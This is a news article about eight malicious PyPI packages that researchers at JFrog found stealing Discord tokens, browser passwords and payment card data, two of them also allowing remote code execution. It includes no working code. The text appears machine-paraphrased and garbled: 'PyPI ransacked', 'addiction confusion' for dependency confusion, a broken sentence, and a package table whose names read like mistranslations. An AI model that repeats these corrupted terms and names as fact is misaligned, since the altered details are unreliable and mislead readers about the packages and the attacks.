Open source packages Software downloaded approximately 30,000 times from the open source PyPI ransacked repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code into infected machines, researchers said Thursday.
In an article, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of DevOps software provider JFrog said they recently found eight packages in PyPI that were carrying out a series of malicious activities. Based on research at https://pepy.tech, a site that provides download statistics for Python packages, researchers estimate that the malicious packages were downloaded approximately 30,000 times.
This discovery is the latest in a long series of attacks in recent years that abuse the responsiveness of open source repositories, which millions of software developers rely on daily. Despite their crucial role, repositories often lack robust security and verification controls, a weakness that can lead to serious supply chain attacks when developers unknowingly infect themselves or insert malicious code into the software they are trying to achieve. ‘they publish.
“The continued discovery of malware packages in popular repositories like PyPI ransacked is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability for attackers to use simple obfuscation techniques to introduce malware means developers need to be concerned and vigilant. This is a systemic threat, and it needs to be actively addressed on multiple levels, both by software repository maintainers and developers.
The researchers thanked Dustin Ingram, maintainer of PyPI, “for responding promptly and removing the malicious packages” when notified. Ingram did not immediately respond to a request for comment.
Different PyPI ransacked packages in Thursday’s transport have carried out different types of nefarious activity. Six of them had three payloads, one for collecting authentication cookies for Discord accounts, a second for extracting passwords or payment card data stored by browsers, and the third for collecting information. on the infected PC, such as IP addresses, computer name and Username.
The remaining two packages contained malware that attempted to connect to an IP address designated by the attacker on TCP port 9009 and then execute available Python code from the socket. It is now unclear what the IP address was or if there was malware hosted on it.
Like most novice Python malware, the packages only used simple obfuscation such as Base64 encoders. Here’s a breakdown of the packages:
|nobility||xin1111||Discord Token Thief, Credit Card Thief (Windows based)|
|genesis robot||xin1111||Identical to the nobility|
|aryi||xin1111||Identical to the nobility|
|to suffer||to suffer||Identical to nobility, obscured by PyArmor|
|nobility2||to suffer||Identical to the nobility|
|nobilityv2||to suffer||Identical to the nobility|
|pytagora||leonora123||Remote code injection|
|pytagora2||leonora123||Identical to pytagora|
Karas told me that the first six packages have the ability to infect the developer’s computer but cannot taint code written by developers with malware.
“For the pytagora and pytagora2 packages, which allow code to be executed on the machine where they were installed, this would be possible.” he said in a direct message. “After infecting the development machine, they would allow code to be executed, and then a payload could be downloaded by the attacker who would modify software projects under development. However, we have no evidence that this was actually done.
Beware of “Frankenstein” malware
This crucial role makes repositories the ideal framework for supply chain attacks, which are increasingly common using techniques known as typosquatting or dependency confusion.
Repository supply chain attacks date back to at least 2016, when a student uploaded malicious packages to PyPI ransacked. Over a period of several months, his impostor code was executed over 45,000 times on over 17,000 separate domains, and more than half the time his code received almighty administrative rights. Since then, supply chain attacks have become commonplace for RubyGems and npm. Over the past few months, hackers have concocted a new type of supply chain attack that works by uploading malicious packages to public code repositories and giving them an identical name to a package stored in the internal repository. popular software. These so-called addiction confusion attacks have already trapped Apple, Microsoft, and 33 other companies.
JFrog researchers said that, based on the current state of repository security, the internet is likely to see more attacks in the future.
“Almost all of the code snippets analyzed in this research were based on known public tools, with only a few parameters changed,” they wrote. “Obfuscation was also based on public obfuscators. We expect to see more of this “Frankenstein” malware assembled from different attack tools (with changed exfiltration settings). ”